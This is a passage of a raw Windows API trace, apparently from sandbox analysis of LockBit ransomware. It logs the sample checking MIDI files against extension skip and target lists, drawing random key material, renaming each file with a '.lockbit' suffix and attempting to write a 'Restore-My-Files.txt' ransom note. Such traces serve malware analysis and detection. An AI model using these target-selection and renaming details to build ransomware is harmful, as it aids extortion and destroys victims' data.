lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0165.471] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0165.471] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0165.471] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0165.471] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0165.471] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0165.471] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0165.471] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0165.471] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.471] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0165.471] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0165.471] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0165.471] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0165.471] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PARNT_05.MID") returned 1 [0165.472] lstrcmpiW (lpString1="ntldr", lpString2="PARNT_05.MID") returned -1 [0165.472] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PARNT_05.MID") returned -1 [0165.472] lstrcmpiW (lpString1="bootsect.bak", lpString2="PARNT_05.MID") returned -1 [0165.472] lstrcmpiW (lpString1="autorun.inf", lpString2="PARNT_05.MID") returned -1 [0165.472] lstrcmpiW (lpString1="thumbs.db", lpString2="PARNT_05.MID") returned 1 [0165.472] lstrcmpiW (lpString1="iconcache.db", lpString2="PARNT_05.MID") returned -1 [0165.472] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.472] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID") returned=".MID" [0165.472] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0165.472] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0165.472] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0165.472] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0165.472] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0165.472] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0165.472] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0165.472] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0165.472] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0165.472] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0165.472] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0165.472] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0165.472] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0165.472] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0165.472] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0165.472] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0165.472] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0165.473] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0165.473] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0165.473] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0165.473] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0165.473] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0165.473] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0165.473] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0165.473] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0165.473] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0165.473] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0165.473] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0165.473] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID.lockbit") returned 72 [0165.473] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_05.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.475] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.475] malloc (_Size=0x40068) returned 0x3df0008 [0165.475] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6020) returned 1 [0165.475] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.476] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.476] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.476] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.477] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.477] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0165.481] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.481] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.482] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0165.482] free (_Block=0x1fa2ed8) [0165.482] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_05.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.482] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.483] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.483] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1e58, dwReserved0=0x0, dwReserved1=0x0, cFileName="PARNT_06.MID", cAlternateFileName="")) returned 1 [0165.483] lstrcmpiW (lpString1=".", lpString2="PARNT_06.MID") returned -1 [0165.483] lstrcmpiW (lpString1="..", lpString2="PARNT_06.MID") returned -1 [0165.483] PathFindExtensionW (pszPath="PARNT_06.MID") returned=".MID" [0165.483] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0165.483] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0165.483] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0165.483] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0165.483] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0165.483] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0165.483] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0165.483] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0165.483] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0165.483] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0165.483] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0165.483] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0165.483] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0165.483] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0165.483] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0165.483] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0165.483] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0165.483] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0165.484] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0165.484] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0165.484] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0165.484] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0165.484] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0165.484] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0165.484] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.484] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0165.484] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0165.484] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0165.484] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0165.484] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0165.484] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0165.484] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0165.484] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0165.484] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0165.484] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0165.484] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0165.484] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0165.484] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0165.484] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0165.484] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0165.484] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0165.484] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0165.484] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.484] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0165.485] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0165.485] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0165.485] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0165.485] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PARNT_06.MID") returned 1 [0165.485] lstrcmpiW (lpString1="ntldr", lpString2="PARNT_06.MID") returned -1 [0165.485] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PARNT_06.MID") returned -1 [0165.485] lstrcmpiW (lpString1="bootsect.bak", lpString2="PARNT_06.MID") returned -1 [0165.485] lstrcmpiW (lpString1="autorun.inf", lpString2="PARNT_06.MID") returned -1 [0165.485] lstrcmpiW (lpString1="thumbs.db", lpString2="PARNT_06.MID") returned 1 [0165.485] lstrcmpiW (lpString1="iconcache.db", lpString2="PARNT_06.MID") returned -1 [0165.485] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.485] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID") returned=".MID" [0165.485] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0165.485] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0165.485] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0165.485] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0165.485] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0165.485] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0165.485] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0165.485] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0165.485] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0165.485] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0165.485] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0165.485] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0165.485] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0165.485] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0165.485] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0165.486] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0165.486] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0165.486] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0165.486] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0165.486] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0165.486] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0165.486] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0165.486] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0165.486] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0165.486] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0165.486] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0165.486] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0165.486] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0165.486] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID.lockbit") returned 72 [0165.486] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_06.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.487] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.487] malloc (_Size=0x40068) returned 0x3df0008 [0165.487] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7768) returned 1 [0165.487] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.488] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.489] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.494] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.494] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.494] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.496] free (_Block=0x1fa2ed8) [0165.496] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_06.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.496] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.496] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.496] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x19a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PARNT_07.MID", cAlternateFileName="")) returned 1 [0165.497] lstrcmpiW (lpString1=".", lpString2="PARNT_07.MID") returned -1 [0165.497] lstrcmpiW (lpString1="..", lpString2="PARNT_07.MID") returned -1 [0165.497] PathFindExtensionW (pszPath="PARNT_07.MID") returned=".MID" [0165.497] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0165.497] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0165.497] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0165.497] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0165.497] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0165.497] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0165.497] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0165.497] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0165.497] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0165.497] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0165.497] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0165.497] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0165.497] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0165.497] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0165.497] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0165.497] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0165.497] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0165.497] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0165.497] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0165.498] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0165.498] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0165.498] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0165.498] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0165.498] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0165.498] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.498] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0165.498] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0165.498] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0165.498] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0165.498] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0165.498] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0165.498] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0165.498] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0165.498] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0165.498] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0165.498] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0165.498] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0165.498] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0165.498] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0165.498] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0165.498] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0165.498] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0165.498] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.498] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0165.498] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0165.498] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0165.499] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0165.499] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PARNT_07.MID") returned 1 [0165.499] lstrcmpiW (lpString1="ntldr", lpString2="PARNT_07.MID") returned -1 [0165.499] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PARNT_07.MID") returned -1 [0165.499] lstrcmpiW (lpString1="bootsect.bak", lpString2="PARNT_07.MID") returned -1 [0165.499] lstrcmpiW (lpString1="autorun.inf", lpString2="PARNT_07.MID") returned -1 [0165.499] lstrcmpiW (lpString1="thumbs.db", lpString2="PARNT_07.MID") returned 1 [0165.499] lstrcmpiW (lpString1="iconcache.db", lpString2="PARNT_07.MID") returned -1 [0165.499] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.499] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID") returned=".MID" [0165.499] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0165.499] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0165.499] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0165.499] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0165.499] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0165.499] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0165.499] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0165.499] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0165.499] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0165.499] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0165.499] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0165.499] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0165.499] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0165.499] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0165.499] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0165.499] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0165.500] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0165.500] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0165.500] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0165.500] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0165.500] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0165.500] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0165.500] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0165.500] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0165.500] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0165.500] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0165.500] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0165.500] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0165.500] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID.lockbit") returned 72 [0165.500] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_07.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.501] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.501] malloc (_Size=0x40068) returned 0x3df0008 [0165.501] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6564) returned 1 [0165.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.502] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.502] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.502] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.503] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.507] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.507] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.507] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0165.508] free (_Block=0x1fa2ed8) [0165.508] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_07.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.509] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft 